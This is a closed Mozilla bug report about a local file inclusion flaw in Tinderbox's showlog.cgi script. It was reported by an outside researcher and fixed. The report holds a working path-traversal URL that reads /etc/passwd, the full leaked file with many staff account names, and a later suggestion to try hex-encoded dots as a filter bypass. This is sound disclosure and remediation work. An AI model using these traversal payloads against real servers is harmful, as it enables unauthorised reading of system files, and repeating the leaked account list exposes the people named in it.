Closed Bug 823923 Opened 12 years ago Closed 12 years ago

local file inclusion vulnerability in Tinderbox

Categories

(Webtools Graveyard :: Tinderbox, defect)

Product:
Webtools Graveyard
Component:
Tinderbox
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: curtisk, Assigned: mozilla)

References

Details

(Keywords: reporter-external)

Hello, my name is Fabián Cuchietti, i'm a security researcher... In this research i have found "Local File Inclusion (LFI)". A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. this issue by reading some files from the target web server. (IS BUG BOUNTY?) Url http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation cg-bugs01&fulltext=1 Parameter Name logfile Parameter Type Querystring Attack Pattern ../../../../../../../../../../../etc/passwd Response: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin nagios:x:101:102:nagios:/var/log/nagios:/bin/sh apache:x:48:48:Apache:/var/www:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin bonsai:x:522:105::/home/bonsai:/bin/bash tinderbox:x:521:104::/home/tinderbox:/bin/bash varnish:x:103:107:Varnish http accelerator user:/var/lib/varnish:/sbin/nologin nginx:x:104:108:Nginx user:/var/lib/nginx:/bin/false hpsmh:x:400:400::/opt/hp/hpsmh:/sbin/nologin _lldpd:x:105:109:LLDP daemon:/var/run/lldpd:/bin/false infrasec:x:2324:2324::/home/infrasec:/bin/bash dmoore:x:599:599::/home/dmoore:/bin/bash bhourigan:x:1734:1734::/home/bhourigan:/bin/bash arr:x:1556:1556::/home/arr:/bin/tcsh rtucker:x:1509:1509::/home/rtucker:/bin/bash rpina:x:1396:1396::/home/rpina:/bin/bash mburns:x:1726:1726::/home/mburns:/bin/bash justdave:x:504:504::/home/justdave:/bin/bash mrz:x:506:506::/home/mrz:/bin/tcsh gdestuynder:x:1663:1663::/home/gdestuynder:/bin/bash shyam:x:1137:1137::/home/shyam:/bin/bash jvier:x:1449:1449::/home/jvier:/bin/bash jthomas:x:1700:1700::/home/jthomas:/bin/bash jcrowe:x:1735:1735::/home/jcrowe:/bin/bash mlarrain:x:1647:1647::/home/mlarrain:/bin/bash rbryce:x:1736:1736::/home/rbryce:/bin/bash pchiasson:x:1645:1645::/home/pchiasson:/bin/bash tmary:x:1592:1592::/home/tmary:/bin/bash dmitchell:x:1458:1458::/home/dmitchell:/bin/bash ghuerta:x:1524:1524::/home/ghuerta:/bin/bash oremj:x:505:505::/home/oremj:/bin/bash mpressman:x:1595:1595::/home/mpressman:/bin/bash nmaul:x:1549:1549::/home/nmaul:/bin/bash mcoates:x:1306:1306::/home/mcoates:/bin/bash scabral:x:1808:1808::/home/scabral:/bin/bash ashish:x:1579:1579::/home/ashish:/bin/bash amilewski:x:1177:1177::/home/amilewski:/bin/bash eparker:x:1797:1797::/home/eparker:/bin/bash ckolos:x:1732:1732::/home/ckolos:/bin/bash jdow:x:1299:1299::/home/jdow:/bin/bash cshields:x:1047:1047::/home/cshields:/bin/bash dgherman:x:1562:1562::/home/dgherman:/bin/bash jstevensen:x:1679:1679::/home/jstevensen:/bin/bash jlazaro:x:1303:1303::/home/jlazaro:/bin/bash rsoderberg:x:1432:1432::/home/rsoderberg:/bin/bash petef:x:1519:1519::/home/petef:/bin/bash jwatkins:x:1787:1787::/home/jwatkins:/bin/bash cliang:x:1795:1795::/home/cliang:/bin/bash ahill2:x:1541:1541::/home/ahill2:/bin/bash rmilewski:x:1427:1427::/home/rmilewski:/bin/bash dparsons:x:1724:1724::/home/dparsons:/bin/bash bkero:x:1369:1369::/home/bkero:/bin/bash rhelmer:x:1476:1476::/home/rhelmer:/bin/bash lthomson:x:5506:5506::/home/lthomson:/bin/bash afernandez:x:1905:1905::/home/afernandez:/bin/bash cransom:x:1835:1835::/home/cransom:/bin/bash jhayashi:x:1848:1848::/home/jhayashi:/bin/bash bobm:x:1925:1925::/home/bobm:/bin/bash mmayo:x:1788:1788::/home/mmayo:/bin/bash bburton:x:1868:1868::/home/bburton:/bin/bash cturra:x:1909:1909::/home/cturra:/bin/bash dmaher:x:1924:1924::/home/dmaher:/bin/bash amckay:x:1217:1217::/home/amckay:/bin/bash eziegenhorn:x:1892:1892::/home/eziegenhorn:/bin/bash ayounsi:x:1155:1155::/home/ayounsi:/bin/bash mhenry:x:1927:1927::/home/mhenry:/bin/bash juber:x:1959:1959::/home/juber:/bin/bash ossec:x:401:401::/var/ossec:/sbin/nologin ossecm:x:402:401::/var/ossec:/sbin/nologin ossecr:x:403:401::/var/ossec:/sbin/nologin Best regards, Fabián Cuchietti.
Flags: sec-bounty?
showlog.cgi file located here https://mxr.mozilla.org/mozilla/source/webtools/tinderbox/showlog.cgi Someone else will have to audit the code since I'm not that good at perl.
You still have not corrected the vulnerability.?
reed: Who is the appropriate assignee for this bug?
Flags: needinfo?(reed)
I'll take it.
Assignee: nobody → reed
Flags: needinfo?(reed)
If we're not going to fix it can we just shut tinderbox down? What hasn't migrated to tbpl?
Flags: sec-bounty? → sec-bounty+
http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, root@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Apache Server at tinderbox.mozilla.org Port 80
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
(In reply to Michael Henry [:tinfoil] from comment #7) > http://tinderbox.mozilla.org/showlog. > cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../ > etc/passwd&buildtime=1356022860&buildname=documentation Where's the patch that fixed this? Apparently, it was done in bug 842742, which I can't see. Why was a separate bug filed? Work should have been done in this bug. We don't do separate super-hidden bugs for normal security fixes, so why in the world would we do the same here? The fix, which while it may work, is definitely not the best way to do this: http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&root=/cvsroot&subdir=mozilla/webtools/tinderbox&command=DIFF_FRAMESET&root=/cvsroot&file=showlog.cgi&rev1=1.35&rev2=1.36 Has anybody tried using hex codes for '.' and seeing if it still works (or some other form of obfuscation of the '.')?
Assignee: reed → aki
If you mean .. , f/e, that doesn't work.
Group: webtools-security
Depends on: tinderbox-death
Product: Webtools → Webtools Graveyard
You need to log in before you can comment on or make changes to this bug.